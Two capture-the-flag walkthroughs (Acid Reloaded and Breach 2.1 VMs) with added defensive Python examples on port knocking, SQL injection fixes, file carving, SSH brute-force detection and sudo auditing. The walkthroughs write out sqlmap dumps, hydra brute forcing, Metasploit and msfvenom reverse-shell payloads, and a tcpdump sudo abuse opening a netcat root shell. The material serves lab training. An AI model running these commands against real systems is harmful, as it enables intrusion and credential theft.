Hack Acid Reloaded VM (CTF Challenge)


The name of the virtual machine is "Acid-Reloaded"; it was created by Avinash Thappa. This virtual machine contains both network logic and web logic. You need to extract the rar and run the vmx using VMplayer. The machine has DHCP active, so once it is automatically assigned an IP address, the next step is to identify the target and discover the service(s) to start the game.
GOAL: Escalate privileges to the root user and capture the flag. Once anyone is able to beat the box, shoot me a mail.
Penetration Methodology
§  Network scanning (netdiscover, nmap)
§  Port knocking (netcat)
§  Abusing HTTP web service (Burpsuite)
§  SQL injection (sqlmap)
§  SSH brute force (Hydra)
§  Access PTY shell (ssh login)
§  Kernel privilege escalation

Let’s Begin!!
As always, start by finding our target:
netdiscover


This tells us that our target is 192.168.1.106. Now it is time to scan with nmap.

nmap -A 192.168.1.106


The result of nmap shows us that only port 22 is open, with the SSH service. Let's check out port 22.
ssh 192.168.1.106
"Wann Knock me out???" sounds like a port knocking hint, therefore let's go for port knocking.


Following the hint on port 22 (3.2.1 let's Start the Game), we will use netcat for the port knocking technique.
nc 192.168.1.106 3
nc 192.168.1.106 2
nc 192.168.1.106 1


Let’s scan with nmap again.
nmap -p- -A 192.168.1.106
Port knocking helped us open port 33447, on which an HTTP service is now exposed.
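To show what the 3, 2, 1 knock sequence actually does on the listening side, here is an added example of a minimal knock gate in Python. It is not part of the original write-up and not the daemon running on the VM; the sequence, the time window and the source addresses are assumptions of the demo. Knocks must arrive in order within the window, a stray port resets the attempt, and only a completed sequence marks the source as allowed.

```python
from typing import Dict, List, Set, Tuple


class KnockGate:
    """Tracks knock progress per source address.

    `sequence` is the expected port order (3, 2, 1 in the walkthrough) and `window`
    the maximum seconds between the first and last knock of one attempt; both are
    assumptions of this demo, not values read from the VM.
    """

    def __init__(self, sequence: List[int], window: float = 10.0) -> None:
        self.sequence = list(sequence)
        self.window = window
        # src -> (index of the next expected port, time of first knock in this attempt)
        self.progress: Dict[str, Tuple[int, float]] = {}
        self.opened: Set[str] = set()

    def knock(self, src: str, port: int, now: float) -> bool:
        """Record one connection attempt from src; True when the sequence completes."""
        idx, started = self.progress.get(src, (0, now))
        if idx > 0 and now - started > self.window:
            idx = 0                      # attempt took too long, start over
        if idx == 0:
            started = now
        if port == self.sequence[idx]:
            idx += 1                     # expected port: advance
        elif port == self.sequence[0]:
            idx, started = 1, now        # stray hit that is itself a valid first knock
        else:
            idx = 0                      # any other port resets: no partial credit
        if idx == len(self.sequence):
            self.opened.add(src)
            self.progress.pop(src, None)
            return True
        self.progress[src] = (idx, started)
        return False

    def is_open(self, src: str) -> bool:
        return src in self.opened


def replay(gate: KnockGate, src: str, knocks: List[Tuple[int, float]]) -> bool:
    """Feed a list of (port, timestamp) knocks; return whether src ended up allowed."""
    for port, ts in knocks:
        gate.knock(src, port, ts)
    return gate.is_open(src)


if __name__ == "__main__":
    gate = KnockGate([3, 2, 1], window=10.0)
    # constructed source addresses
    print(replay(gate, "192.0.2.10", [(3, 0.0), (2, 1.0), (1, 2.0)]))   # in order: allowed
    print(replay(gate, "192.0.2.11", [(3, 0.0), (1, 1.0), (2, 2.0)]))   # out of order: not allowed
```

A real knock daemon would watch a packet capture or firewall log rather than take timestamps as arguments, and would add a firewall rule for the source instead of a set entry; the state machine is the same.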


Now open the target IP on browser using this port.
http://192.168.1.106:33447



A simple webpage opens that tells us to use our brain. Haha! Even the page source did not help. It's time to use dirb for a directory brute-force attack.
dirb http://192.168.1.106:33447


It turned up many web directories, but to me /bin/ looked interesting, as it might hold a shell. No harm in checking it out in the browser, so let's do that.



And it's a login portal. Now let's check its page source.


In the page source there is a path called includes/validation.php. I decided to check it out.
Unfortunately, I could not find anything there, so I decided to use DirBuster to find more directories.


In DirBuster, give the URL and for the wordlist use the medium 1.0 wordlist. Then click the Start button and it will start finding directories. It found many PHP files, as shown below.


I checked every directory related to bin, and only /bin/dashboard.php was useful. When I opened it in the browser I found nothing useful, so I looked into the page source, and even that proved to be of no use.


When nothing helped, I decided to capture the request with BurpSuite. To do so, set the proxy, turn on interception and simply reload the page. When the request is captured, add the following header below Host:

Referer: http://192.168.1.106:33447/bin/includes/validation.php


Now, as soon as you hit the Forward button, it will automatically log you in.


The page says to click, and when you do that it redirects to the following page.


There was nothing on the redirected page or its page source, so I decided to check for SQL injection and looked for a web page taking an id=1 parameter. Luckily we made the right guess and got the following result for id=1.


Using a single quote (') I checked for SQL injection and got a MySQL error message, which means the web application is vulnerable to SQL injection.


So I decided to use SQLMap.
sqlmap -u "http://192.168.1.106:33447/bin/l33t_haxor.php?id=1" --dbs --tamper=space2comment


We got the database name secure_login; now let's find out the tables.


sqlmap -u "http://192.168.1.106:33447/bin/l33t_haxor.php?id=1" -D secure_login --tables --tamper=space2comment
It shows us the name of the table, i.e. UB3R/strcpy.exe.
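The single-quote test above works because the id value is pasted into the SQL text. The following added example (not code from the write-up or from the VM) reproduces that behaviour over an in-memory SQLite table and sets a parameterised query beside it, so the error signal and the fix can both be run offline. The table, rows and column names are constructed for the demo; the VM's real schema is not known here.

```python
import sqlite3
from typing import List, Tuple

# Constructed stand-in for the application's table.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE items (id INTEGER, name TEXT)")
DB.executemany("INSERT INTO items VALUES (?, ?)", [(1, "public"), (2, "secret")])


def lookup_vulnerable(user_id: str) -> List[str]:
    """String concatenation: whatever arrives in ?id= becomes part of the SQL text."""
    sql = "SELECT name FROM items WHERE id=" + user_id
    return [row[0] for row in DB.execute(sql)]


def lookup_safe(user_id: str) -> List[str]:
    """Parameterised query: the value is bound, never parsed as SQL. The id
    parameter is also validated up front to match its integer contract."""
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    rows = DB.execute("SELECT name FROM items WHERE id=?", (int(user_id),))
    return [row[0] for row in rows]


def probe(user_id: str) -> Tuple[str, object]:
    """Classify what the vulnerable handler does with an input: ('error', message)
    is the same signal the walkthrough read off the MySQL error page."""
    try:
        return ("rows", lookup_vulnerable(user_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    for value in ("1", "1'", "1 OR 1=1"):
        print(repr(value), "->", probe(value))
    print("safe:", lookup_safe("1"))
```

The error branch is the tell an attacker (and a tool like sqlmap) keys on; the hardened handler returns the same result for `1` and refuses anything that is not an integer, so neither the error page nor the `OR 1=1` row dump exists.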


When I opened /UB3R/strcpy.exe in the browser, a dialog box opened and asked me to save a file, and so I did.


Now use the file command to learn more about it; it turned out to be a PDF document, version 1.5. Then I used foremost, a forensic tool that recovers files using their headers and footers.
file strcpy.exe
foremost strcpy.exe


As soon as you run the above command, a folder named output is created. Let's check out this folder.
cd output
ls
There is a text file in the folder named audit.txt; I read it with the cat command.
cat audit.txt
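What foremost does with strcpy.exe is scan for known magic numbers and cut out whatever lies between a header and its footer (or the next header). Here is an added example of that carving step in Python; it is not foremost's code and the sample buffer is constructed here, not the real file, but it shows how a PDF-looking file can be found to carry a RAR archive after its %%EOF.

```python
import re
from typing import Dict, List, Tuple

# Magic numbers for the formats in the walkthrough (PDF, RAR) plus two common ones.
# The RAR value is the RAR 1.5-4.x marker block; RAR5 uses Rar!\x1a\x07\x01\x00.
SIGNATURES: Dict[str, bytes] = {
    "pdf": b"%PDF-",
    "rar": b"Rar!\x1a\x07\x00",
    "jpg": b"\xff\xd8\xff",
    "zip": b"PK\x03\x04",
}
# Footers where the format has a reliable one; RAR and ZIP are cut at the next header.
FOOTERS: Dict[str, bytes] = {"pdf": b"%%EOF", "jpg": b"\xff\xd9"}


def carve(buf: bytes) -> List[Tuple[str, int, int]]:
    """Return (kind, start, end) for every embedded object found, in file order.
    end is just past the footer when one is known and found, otherwise the next
    header or end of buffer."""
    hits = sorted((m.start(), kind)
                  for kind, magic in SIGNATURES.items()
                  for m in re.finditer(re.escape(magic), buf))
    out = []
    for i, (start, kind) in enumerate(hits):
        limit = hits[i + 1][0] if i + 1 < len(hits) else len(buf)
        end = limit
        footer = FOOTERS.get(kind)
        if footer is not None:
            pos = buf.find(footer, start, limit)
            if pos != -1:
                end = pos + len(footer)
        out.append((kind, start, end))
    return out


def extract(buf: bytes) -> List[Tuple[str, bytes]]:
    """(name, data) pairs named the way foremost names output: zero-padded offset + extension."""
    return [(f"{start:08d}.{kind}", buf[start:end]) for kind, start, end in carve(buf)]


# Constructed sample: a tiny PDF, some padding, then a RAR marker block and filler.
SAMPLE = (b"%PDF-1.5\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"
          + b"\x00" * 16
          + b"Rar!\x1a\x07\x00" + b"\x33" * 40)


if __name__ == "__main__":
    for name, data in extract(SAMPLE):
        print(name, len(data), "bytes")
```

Because the PDF has a footer, the carver stops at %%EOF and the RAR marker that follows is reported as its own object, which is exactly why `file` saw only a PDF while foremost also produced the .rar.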


There is a .rar, which I decided to unrar.
unrar x 00000213.rar
On extracting, two files come out: acid.txt and lol.jpg. I decided to read acid.txt.
cat acid.txt
This .txt tells us that we are on the right path. So of course next I opened lol.jpg.
exiftool lol.jpg
But found nothing, so I extracted it with unrar.
unrar e lol.jpg


Extracting lol.jpg gave me two files again: hint.txt and Avinash.contact. hint.txt told me to go with Avinash.contact, so I opened that next.
cat hint.txt
cat Avinash.contact


There was base64 text in the file, so we decoded it with echo and base64 as shown, and it turned out to be NooB@123.
Syntax: echo <base64 text> | base64 -d


Then I brute-forced SSH using a text file of candidate usernames I had created, with NooB@123 as the password. With the following command we try the SSH login and successfully obtain a working pair of credentials.
hydra -L user.txt -p NooB@123 -u 192.168.1.106 ssh


And it gave us makke:NooB@123 as the username and password respectively. So I logged in with SSH.
ssh makke@192.168.1.106
Give the password when asked. Once logged in, I checked the kernel version and tried to download an exploit for it, but that did not work: all the options for downloading were blocked, so I started exploring.
So I went directly to /bin.
cd /bin
ls
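The hydra step above leaves a very recognisable trail in the target's auth log: a burst of "Failed password" lines from one source, often followed by an "Accepted password". The following added example (not from the write-up) is the defender's side of that step: it parses OpenSSH log lines and flags any source exceeding a failure threshold inside a sliding window. The log lines are constructed, and the year is supplied by hand because syslog timestamps carry none.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, Iterable, List, Optional, Set, Tuple

# Constructed auth.log excerpt: one burst from a single source, then two isolated failures.
SAMPLE_LOG: List[str] = [
    "Jun 12 10:00:01 acid sshd[1201]: Failed password for invalid user admin from 192.168.1.50 port 40001 ssh2",
    "Jun 12 10:00:03 acid sshd[1203]: Failed password for invalid user acid from 192.168.1.50 port 40002 ssh2",
    "Jun 12 10:00:05 acid sshd[1205]: Failed password for root from 192.168.1.50 port 40003 ssh2",
    "Jun 12 10:00:07 acid sshd[1207]: Failed password for invalid user saman from 192.168.1.50 port 40004 ssh2",
    "Jun 12 10:00:09 acid sshd[1209]: Failed password for makke from 192.168.1.50 port 40005 ssh2",
    "Jun 12 10:00:11 acid sshd[1211]: Accepted password for makke from 192.168.1.50 port 40006 ssh2",
    "Jun 12 10:05:00 acid sshd[1300]: Failed password for makke from 10.0.0.7 port 50001 ssh2",
    "Jun 12 10:45:00 acid sshd[1400]: Failed password for makke from 10.0.0.7 port 50002 ssh2",
]

FAILED = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failure(line: str, year: int = 2019) -> Optional[Tuple[datetime, str, str]]:
    """Return (timestamp, user, source ip) for a failed-password line, else None.
    The year is an assumption of the demo since syslog lines do not record it."""
    m = FAILED.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["ip"]


def brute_force_sources(lines: Iterable[str], threshold: int = 5,
                        window_s: int = 60) -> Dict[str, Set[str]]:
    """Return {source ip: usernames tried} for every source that produced at least
    `threshold` failures within any `window_s`-second span (sliding window per source)."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    users: Dict[str, Set[str]] = defaultdict(set)
    flagged: Dict[str, Set[str]] = {}
    for line in lines:
        parsed = parse_failure(line)
        if parsed is None:
            continue
        ts, user, ip = parsed
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()            # drop failures that fell out of the window
        if len(q) >= threshold:
            flagged[ip] = users[ip]
    return flagged


if __name__ == "__main__":
    for ip, names in brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {len(names)} distinct users tried: {sorted(names)}")
```

The username spread per source is the useful second signal: a legitimate user mistyping a password tries one name, while a `-L user.txt` run cycles through many. Tools such as fail2ban apply the same window logic and block the source at the firewall.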


In /bin there was a file called overlayfs. This is a famous exploit, so I executed it.
./overlayfs
id
ls -la
And fortunately there was a flag.txt.
cat flag.txt


Hack the Breach 2.1 VM (CTF Challenge)

Breach 2.1 is the second VM in the multi-part Boot2Root CTF series, developed by mrb3n. It is a high-level challenge with a lot of scenarios, including plenty of twists and trolls along the way. It works on a static IP, i.e. 192.168.110.151, therefore we have configured our adapter as a host-only adapter.
WalkThrough
As our VM is hosted on a static IP, there is no need to discover our target; we will start directly by scanning it.

nmap -p- -A 192.168.110.151


Nmap shows us that only three ports are open: 111, 52263 and 65535, with the services rpcbind, status and SSH respectively. Let's check the SSH port.
ssh 192.168.110.151 -p 65535
Here,
-p = a specified port


Here I gave the password "inthesource" because in the area between the hashes it says "Peter, if that's you – the password is in the source". It did not work though. LOL! So I just gave nmap another try, and port 80 was open this time.
ssh peter@192.168.110.151 -p 65535


As port 80 has just opened, luckily we can open it in our browser now.


The webpage says "Welcome to Initech Cyber Consulting, LLC" and something about BeEF. Even in the page source I found nothing, so I decided to use DirBuster. It showed me a lot of directories, but the one that caught my interest was /blog/.


So I opened it in the browser. It was a travel blog. There was a search box on the blog, so I tried SQL injection by entering a single quote (').


This way I found a SQL injection vulnerability, so I used SQLMap next.


This command starts the process and shows you five table names in the database.


Out of these five, oscommerce is the most famous e-commerce CMS, and this blog was also related to commerce. So I decided to run my next SQLMap command against this table in the database.
sqlmap -u "http://192.168.110.151/blog/index.php?search=" --dbs -D oscommerce --tables --dump


Executing this command will give you a username and password. The username is admin, but the password you receive will be an MD5 hash value.


You can crack this MD5 hash using any third-party tool, or use an online service like I did.


The cracked password you get here is 32admin. Now I had a username and password but no login portal. So I started exploring the blog but couldn't find anything, so I copied and pasted its copyright information into Google.


Searching Google, the first link was to exploit-db.com, which means there is an exploit for the said software. So I opened the link and explored it.

In the exploit there was information about XSS and a link was provided. Now, I know that BeEF does XSS work, and on the very first webpage there was something about BeEF too. So naturally I started working with BeEF.


BeEF automatically gives us a hook script which includes a link. I copied that link and opened the BeEF panel in the browser.


Here, go to the register option, paste the copied link in the username field and give a random password and email.

As you can see, BeEF will give you a session.


From all the cross-site details BeEF has to show, pay close attention to the browser. You will find that our target is using Firefox 15.0, and fortunately there is an exploit for this in Metasploit.


Now open Metasploit and type the following commands to use the said exploit:
use exploit/multi/browser/firefox_proto_crmfrequest
set payload generic/shell_reverse_tcp
set srvhost 192.168.110.128
set uripath shell
set lhost 192.168.110.128
exploit


Running this exploit will give you a URL; in my case the URL was http://192.168.100.128:4444:8080/shell. Copy this link and go to the BeEF panel. In the BeEF panel go to the Commands tab > Hooked Domain > Redirect Browser. Paste the copied link in the Redirect URL text box.


As you follow the above steps, you will get a shell session.


Now here is the trick: you will lose the session as soon as you get it. You have to upgrade your shell session to a meterpreter session within 5 seconds, and for that type:
use post/multi/manage/shell_to_meterpreter
set session 1
run


And you will have a session. Open that session and you will reach the terminal. In the terminal, let's check out the home folder.
cd /home
ls
In the home folder you will find three folders: bill, milton and peter. That was not of much use, so I went ahead and checked the network status.
netstat -tln


Checking the network status gave me some coordinates. So I checked them on Google Maps and found that they were the coordinates of Houston. Now this word Houston could be a password or username, so I made a mental note of it for later use.


Apart from this I found nothing, so I used telnet just to get a reply, with the following command:
telnet 127.0.0.1 2323


This time it replied with a question: whose stapler is it? I didn't know the answer, so I just pressed Enter. To find the answer I wanted to look at the files of the user milton, and for that the commands are:
find /usr -user milton
cat /usr/local/bin/cd.py


The Python file showed me the program, and as you can see in the image, the code shows that the correct answer is "mine".
So I repeated my steps to reach the same question and gave the answer as mine.



Then I checked the network status again and observed that port 8888 had opened.


I checked this port in the browser and found two directories.

Out of these I opened the oscommerce link and the following page opened.


I had the username and password for this CMS, so I Googled its admin page and logged in with admin as the username and admin as the password.
Note: we cracked the MD5 value of the password to 32admin, but here the 32 is of no use. The password is admin.


It logged in, but to upload malicious code you have to follow the path: File Manager > includes > work. Here you have to upload your PHP code.


To generate the code, go to the terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.110.128 lport=8443 -f raw


Copy the output up to die(); and save it in a .php file.


Before running the file, go to Metasploit and start multi/handler:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.110.128
set lport 8443
exploit
It will give you a meterpreter session; then type the following combination of commands to reach a terminal:
shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
id
Next type:
/var/www/html2/oscommerce/includes/work


We still haven't reached root, but we found blumbergh; let's see what privileges it has.
sudo -l
OK, so it says that it can run tcpdump as root. That's interesting. To abuse tcpdump I need to run the following set of commands:
echo $'id\n/bin/netcat 192.168.110.128 443 -e /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
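The root cause here is the sudo rule itself: tcpdump's -z option runs a post-rotate command, and -Z root keeps that command running as root, so a rule that lets a user run tcpdump as root is a rule that lets them run anything as root. The following added example (not from the write-up) audits `sudo -l` output for that pattern. The sample output is constructed; the NOPASSWD tag and host name are assumptions, and the list of flagged programs deliberately contains only the binary from this walkthrough, to be extended per environment.

```python
import re
from typing import Dict, List, Tuple

# Programs whose documented options hand execution to another command. Only the
# one from the walkthrough is listed; extend this for your own environment.
RISKY: Dict[str, str] = {
    "tcpdump": "-z <cmd> runs a post-rotate command; with -Z root it runs as root",
}

# Matches "(runas) [TAG: ...] command[, command...]" lines from `sudo -l`, e.g.
# "(root) NOPASSWD: /usr/sbin/tcpdump" or "(ALL : ALL) ALL".
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

# Constructed `sudo -l` output for the blumbergh user.
SAMPLE_SUDO_L = """Matching Defaults entries for blumbergh on breach:
    env_reset, mail_badpass

User blumbergh may run the following commands on breach:
    (root) NOPASSWD: /usr/sbin/tcpdump
"""


def audit_sudo_l(text: str) -> List[Tuple[str, str, str]]:
    """Return (runas user, command, reason) for every rule that should be reviewed."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if m is None:
            continue
        runas = m["runas"].split(":")[0].strip()    # "(root)" or "(ALL : ALL)" -> user part
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd == "ALL":
                findings.append((runas, cmd, "unrestricted command set"))
                continue
            base = cmd.split()[0].rsplit("/", 1)[-1]   # /usr/sbin/tcpdump -> tcpdump
            if base in RISKY:
                findings.append((runas, cmd, RISKY[base]))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"review: ({runas}) {cmd}: {reason}")
```

If a non-root user genuinely needs to capture traffic, the usual fix is to grant the capture capabilities on the binary (setcap cap_net_raw,cap_net_admin=eip on tcpdump) or to sudo a wrapper script with fixed arguments, rather than sudo on tcpdump itself with free arguments.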


The tough part is over! Now I just need to run netcat:
nc -nlvp 443
Let's confirm whether we have reached root, and if yes, let's see what it has to offer:
id
cd /root
ls


There is a flag.py file in /root. So no waiting; let's capture the flag.
python .flag.py